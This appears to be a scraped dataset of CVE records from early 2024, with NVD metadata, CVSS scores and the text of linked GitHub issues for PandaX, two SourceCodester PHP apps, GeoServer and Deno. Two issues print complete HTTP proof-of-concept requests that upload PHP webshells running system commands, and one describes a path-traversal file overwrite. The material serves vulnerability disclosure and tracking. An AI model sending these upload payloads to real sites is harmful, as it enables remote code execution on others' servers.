[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pandax:pandax:*:*:*:*:*:*:*:*", "matchCriteriaId": "09811585-2FBA-46CC-95B6-684FDADF7CA3", "versionEndExcluding": null, "versionEndIncluding": "2024-03-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "24" ]
24
https://github.com/PandaXGO/PandaX/issues/6
[ "Issue Tracking" ]
github.com
[ "PandaXGO", "PandaX" ]
# pandax excel 导出任意文件覆盖 或 任意文件下载 <https://github.com/PandaXGO/PandaX/blob/3d265207b631b30b0826c2b6051588a2ae076d7a/apps/system/router/user.go#L153-L161> <https://github.com/PandaXGO/PandaX/blob/3d265207b631b30b0826c2b6051588a2ae076d7a/apps/system/router/role.go#L84-L92> <https://github.com/PandaXGO/PandaX/blob/3d265207b631b30b0826c2b6051588a2ae076d7a/apps/system/router/dict.go#L65-L73> 这三处路由,之后都会调用 `utils.InterfaceToExcel(*list, fileName)` 然后 `rc.Download(fileName)` 选其中一个来看 代码中没有对传入的 `filename` 做检查,使用 `../` 跨目录指定导出的 excel 文件名及目录位置,可以用来覆盖掉不应该覆盖的文件 <https://github.com/PandaXGO/PandaX/blob/3d265207b631b30b0826c2b6051588a2ae076d7a/apps/system/api/user.go#L326-L342> 而且,如果该目标文件没有写权限的话,之后 `rc.Download(fileName)` 又会将这个文件下载下来,就变成了文件读取了 但是调用的是 `http.ServeFile`,只能用来读取项目目录下的文件,无法读取 `/etc/passwd` 等系统文件 <https://github.com/PandaXGO/PandaX/blob/3d265207b631b30b0826c2b6051588a2ae076d7a/kit/restfulx/restfulx.go#L84-L92> 比如这样子去覆盖掉 template 文件 ![](https://pic.l1nyz-tel.cc/202403101132276.png) ![](https://pic.l1nyz-tel.cc/202403101133045.png)
pandax excel 导出 任意文件覆盖 或 任意文件下载
https://api.github.com/repos/PandaXGO/PandaX/issues/6/comments
1
2024-03-10T03:34:17Z
2024-12-04T09:34:30Z
https://github.com/PandaXGO/PandaX/issues/6
2,177,505,961
6
6,007
CVE-2024-2690
2024-03-20T10:15:11.250
A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been classified as critical. Affected is an unknown function of the file /uupdate.php. The manipulation of the argument ima leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257388.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wkeyi0x1/vul-report/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.257388" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.257388" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wkeyi0x1/vul-report/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.257388" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.257388" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:razormist:online_discussion_forum_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1F9F37D-C115-4EC6-A1DD-FFB3869E79C0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/wkeyi0x1/vul-report/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wkeyi0x1", "vul-report" ]
# Online Discussion Forum Site - Arbitrary file vulnerability uploading leads to command execution + Author: liwenjie # Vendor Homepage + https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html # Software Link + https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site # Overview + liwenjie has discovered a vulnerability classified as critical in Online Discussion Forum Site. The function upload is affected. This operation will result in unrestricted uploads. Remote attacks can cause RCE. # Vulnerability Details + Online Discussion Forum Site V1.0 + Vulnerable File: uupdate.php + Parameter Names: filename + Attack Type: Remote # Description + A vulnerability, which was classified as critical, has been found in Online Discussion Forum Site. This issue affects the function upload. The manipulation with an unknown input leads to a unrestricted upload vulnerability. # Proof of Concept (PoC) : <img width="1189" alt="17" src="https://github.com/wkeyi0x1/vul-report/assets/52342243/8fbe4287-8f8e-4eb6-8b68-2bc97beb155f"> ``` POST /uupdate.php HTTP/1.1 Host: www.online-discussion-forum-site.com:8090 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------34962993677915401761480767727 Content-Length: 1226 Origin: http://www.online-discussion-forum-site.com:8090 Connection: close Referer: http://www.online-discussion-forum-site.com:8090/register.php Upgrade-Insecure-Requests: 1 -----------------------------34962993677915401761480767727 Content-Disposition: form-data; name="u_name" a8 -----------------------------34962993677915401761480767727 Content-Disposition: form-data; name="f_name" a8 -----------------------------34962993677915401761480767727 Content-Disposition: form-data; name="pwd" -----------------------------34962993677915401761480767727 Content-Disposition: form-data; name="e_mail" -----------------------------34962993677915401761480767727 Content-Disposition: form-data; name="gender" 1 -----------------------------34962993677915401761480767727 Content-Disposition: form-data; name="dob" -----------------------------34962993677915401761480767727 Content-Disposition: form-data; name="ima"; filename="a.php" Content-Type: text/plain <?php system("whoami"); -----------------------------34962993677915401761480767727 Content-Disposition: form-data; name="add" -----------------------------34962993677915401761480767727 Content-Disposition: form-data; name="sta" -----------------------------34962993677915401761480767727 Content-Disposition: form-data; name="cou" -----------------------------34962993677915401761480767727-- ``` <img width="696" alt="18" src="https://github.com/wkeyi0x1/vul-report/assets/52342243/d92d52c1-45b8-4a03-8753-b377c94b529f"> # Location of vulnerabilities in source code <img width="338" alt="19" src="https://github.com/wkeyi0x1/vul-report/assets/52342243/cb00fe01-2076-4d4d-933c-c890aeadac8b">
Online Discussion Forum Site - Arbitrary file vulnerability uploading leads to command execution - NEW VUL
https://api.github.com/repos/wkeyi0x1/vul-report/issues/2/comments
0
2024-03-19T17:57:09Z
2024-03-19T17:57:09Z
https://github.com/wkeyi0x1/vul-report/issues/2
2,195,621,125
2
6,008
CVE-2024-23643
2024-03-20T18:15:09.047
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.2 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another administrator’s browser when viewed in the GWC Seed Form. Access to the GWC Seed Form is limited to full administrators by default and granting non-administrators access to this endpoint is not recommended. Versions 2.23.2 and 2.24.1 contain a fix for this issue.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/GeoWebCache/geowebcache/commit/9d010e09c784690ada8af43f594461a2553a62f0" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/GeoWebCache/geowebcache/issues/1172" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/GeoWebCache/geowebcache/pull/1174" }, { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/geoserver/geoserver/security/advisories/GHSA-56r3-f536-5gf7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/GeoWebCache/geowebcache/commit/9d010e09c784690ada8af43f594461a2553a62f0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/GeoWebCache/geowebcache/issues/1172" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/GeoWebCache/geowebcache/pull/1174" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/geoserver/geoserver/security/advisories/GHSA-56r3-f536-5gf7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*", "matchCriteriaId": "F58354C1-10A5-4A55-8A22-7DADEEC5ED15", "versionEndExcluding": "2.23.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:geoserver:geoserver:2.24.0:-:*:*:*:*:*:*", "matchCriteriaId": "3EB58700-BA62-496A-BA24-5A08942C1BD3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/GeoWebCache/geowebcache/issues/1172
[ "Issue Tracking" ]
github.com
[ "GeoWebCache", "geowebcache" ]
null
Improve handling special characters in the GWC Seed Form
https://api.github.com/repos/GeoWebCache/geowebcache/issues/1172/comments
0
2023-10-10T16:27:09Z
2023-11-20T11:20:26Z
https://github.com/GeoWebCache/geowebcache/issues/1172
1,935,749,537
1,172
6,009
CVE-2024-23821
2024-03-20T18:15:10.407
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 2.23.4 and 2.24.1 that enables an authenticated administrator with workspace-level privileges to store a JavaScript payload in the GeoServer catalog that will execute in the context of another user's browser when viewed in the GWC Demos Page. Access to the GWC Demos Page is available to all users although data security may limit users' ability to trigger the XSS. Versions 2.23.4 and 2.24.1 contain a patch for this issue.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/GeoWebCache/geowebcache/issues/1171" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/GeoWebCache/geowebcache/pull/1173" }, { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/geoserver/geoserver/security/advisories/GHSA-88wc-fcj9-q3r9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/GeoWebCache/geowebcache/issues/1171" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/GeoWebCache/geowebcache/pull/1173" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/geoserver/geoserver/security/advisories/GHSA-88wc-fcj9-q3r9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*", "matchCriteriaId": "73E1A204-C95D-4B7B-8C8A-E5639834BB97", "versionEndExcluding": "2.23.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:geoserver:geoserver:2.24.0:-:*:*:*:*:*:*", "matchCriteriaId": "3EB58700-BA62-496A-BA24-5A08942C1BD3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/GeoWebCache/geowebcache/issues/1171
[ "Issue Tracking" ]
github.com
[ "GeoWebCache", "geowebcache" ]
null
Improve handling special characters in the GWC Demos Page
https://api.github.com/repos/GeoWebCache/geowebcache/issues/1171/comments
0
2023-10-10T16:26:17Z
2023-11-20T11:20:28Z
https://github.com/GeoWebCache/geowebcache/issues/1171
1,935,748,316
1,171
6,010
CVE-2024-27935
2024-03-21T02:52:22.627
Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 1.35.1 and prior to version 1.36.3, a vulnerability in Deno's Node.js compatibility runtime allows for cross-session data contamination during simultaneous asynchronous reads from Node.js streams sourced from sockets or files. The issue arises from the re-use of a global buffer (BUF) in stream_wrap.ts used as a performance optimization to limit allocations during these asynchronous read operations. This can lead to data intended for one session being received by another session, potentially resulting in data corruption and unexpected behavior. This affects all users of Deno that use the node.js compatibility layer for network communication or other streams, including packages that may require node.js libraries indirectly. Version 1.36.3 contains a patch for this issue.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.7, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 8.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/denoland/deno/commit/3e9fb8aafd9834ebacd27734cea4310caaf794c6" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/denoland/deno/issues/20188" }, { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/denoland/deno/security/advisories/GHSA-wrqv-pf6j-mqjp" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/denoland/deno/commit/3e9fb8aafd9834ebacd27734cea4310caaf794c6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/denoland/deno/issues/20188" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/denoland/deno/security/advisories/GHSA-wrqv-pf6j-mqjp" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:deno:deno:*:*:*:*:*:*:*:*", "matchCriteriaId": "9C495C2E-08BD-43EB-9210-6FF31E09ECCF", "versionEndExcluding": "1.36.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.35.1", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "488" ]
488
https://github.com/denoland/deno/issues/20188
[ "Exploit", "Issue Tracking" ]
github.com
[ "denoland", "deno" ]
## Issue Description When testing two pairs of independent server-socket connections using the provided code, an unexpected data cross-reception issue occurs. The setup involves creating two separate servers, each with their corresponding client socket. The servers receive data from their respective sockets and echo the data back. However, during the test, the data sent by one socket is received by the other socket. This issue leads to incorrect data reception and potential data corruption. This issue affects any Deno code using node packages that rely on `require(net)`. Example:. having 2 `ioredis.Redis` clients connecting to 2 Redis Servers results in issues since one client might receive data from the other client which does not correspond with the actual redis command being sent, thus it results in unexpected errors. ## Steps to Reproduce 1. Create a Deno test file named `socket.test.ts` with the provided test code. 2. Run the test using the command: `deno test -A ./socket.test.ts` ## Expected Behavior The expected behavior is that each socket should receive the data it sent, without any cross-reception. Specifically: * Socket1 should send "111-111-111" and receive "111-111-111". * Socket2 should send "222-222-222" and receive "222-222-222". ## Actual Behavior After running the test, the issue arises where: * Socket1 receives "222-222-222" instead of the expected "111-111-111". * Socket2 receives "222-222-222" as expected. ## Environment Details ``` // deno --version deno 1.36.1 (release, x86_64-unknown-linux-gnu) v8 11.6.189.12 typescript 5.1.6 ``` ## Test Code ```ts // socket.test.ts import { assertEquals } from "https://deno.land/std@0.198.0/assert/assert_equals.ts"; import net_1 from "node:net"; function setupServerSocketPair(port: number): { socket: net_1.Socket, res: string[] } { const server = Deno.listen({ port, transport: "tcp" }); const socket = net_1.createConnection({ port }); const res: string[] = []; (async () => { for await (const conn of server) { conn.readable.pipeTo(conn.writable); } })(); socket.on("data", (data: Uint8Array) => { res.push(new TextDecoder().decode(data)); }); return { socket, res }; } Deno.test({ name: "Multiple Sockets should get correct server data", sanitizeResources: false, sanitizeOps: false, }, async () => { const setup1 = setupServerSocketPair(10001); const setup2 = setupServerSocketPair(20002); assertEquals(setup1.socket.write("111-111-111"), true); assertEquals(setup2.socket.write("222-222-222"), true); // hacky way to wait for socket to receive the data back await new Promise((r) => setTimeout(r, 200)); console.log({ res1: setup1.res, res2: setup2.res }); assertEquals(setup1.res, [ "111-111-111" ]); // This fails !!! Actual / Expected "222-222-222"/ "111-111-111" assertEquals(setup2.res, [ "222-222-222" ]); }); ```
"node:net.Socket": Data Cross-Reception Issue Between Independent Server-Socket Pairs
https://api.github.com/repos/denoland/deno/issues/20188/comments
6
2023-08-17T08:30:44Z
2023-09-08T10:20:35Z
https://github.com/denoland/deno/issues/20188
1,854,522,183
20,188
6,011
CVE-2024-2754
2024-03-21T07:15:47.193
A vulnerability classified as critical has been found in SourceCodester Complete E-Commerce Site 1.0. Affected is an unknown function of the file /admin/users_photo.php. The manipulation of the argument photo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257544.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "MULTIPLE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wkeyi0x1/vul-report/issues/4" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.257544" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.257544" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wkeyi0x1/vul-report/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.257544" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.257544" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:donbermoy:complete_e-commerce_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "511AE27B-E018-462D-83A9-DFF550393621", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/wkeyi0x1/vul-report/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wkeyi0x1", "vul-report" ]
# Complete E-Commerce Site in PHP/MySQLi - Arbitrary file vulnerability uploading leads to command execution + Author: Shuning Yue # Vendor Homepage + https://www.sourcecodester.com/php/14234/complete-e-commerce-site-phpmysqli.html # Software Link + https://www.sourcecodester.com/download-code?nid=14234&title=Complete+E-Commerce+Site+in+PHP%2FMySQLi # Overview + Yue Shuning from Huazhong University of Science and Technology has discovered a vulnerability classified as critical in Complete E-Commerce Site in PHP/MySQLi V1.0. The function upload is affected. This operation will result in unrestricted uploads. Remote attacks can cause RCE. # Vulnerability Details + Complete E-Commerce Site in PHP/MySQLi V1.0 + Vulnerable File: admin/users_photo.php + Parameter Names: filename + Attack Type: Remote # Description + A vulnerability, which was classified as critical, has been found in Complete E-Commerce Site in PHP/MySQLi. This issue affects the function upload. The manipulation with an unknown input leads to a unrestricted upload vulnerability. # Note + To exploit this vulnerability, users need to log in, and the website allows any user to register by default. + # Proof of Concept (PoC) : <img width="1191" alt="1" src="https://github.com/wkeyi0x1/vul-report/assets/52342243/247e0fc3-0d34-4aa8-b7be-c17800fd66a2"> ``` POST /admin/users_photo.php HTTP/1.1 Host: www.ecommerce.com:8091 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------145108311014335905531894526533 Cookie: PHPSESSID=XXXXXXXXXX Upgrade-Insecure-Requests: 1 Content-Length: 359 -----------------------------145108311014335905531894526533 Content-Disposition: form-data; name="photo"; filename="shell.php" Content-Type: image/png <?php system("ipconfig"); -----------------------------145108311014335905531894526533 Content-Disposition: form-data; name="upload" 1 -----------------------------145108311014335905531894526533-- ``` <img width="657" alt="2" src="https://github.com/wkeyi0x1/vul-report/assets/52342243/b62c60a2-975a-4d7d-ac5e-2fc51a0c38c2"> # Location of vulnerabilities in source code <img width="974" alt="3" src="https://github.com/wkeyi0x1/vul-report/assets/52342243/84570622-6166-4850-9683-88d09d2299d9">
Complete E-Commerce Site in PHP/MySQLi - Arbitrary file vulnerability uploading leads to command execution
https://api.github.com/repos/wkeyi0x1/vul-report/issues/4/comments
0
2024-03-20T19:15:42Z
2024-03-20T19:15:42Z
https://github.com/wkeyi0x1/vul-report/issues/4
2,198,365,705
4
6,012
CVE-2024-2849
2024-03-23T18:15:07.770
A vulnerability classified as critical was found in SourceCodester Simple File Manager 1.0. This vulnerability affects unknown code. The manipulation of the argument photo leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257770 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
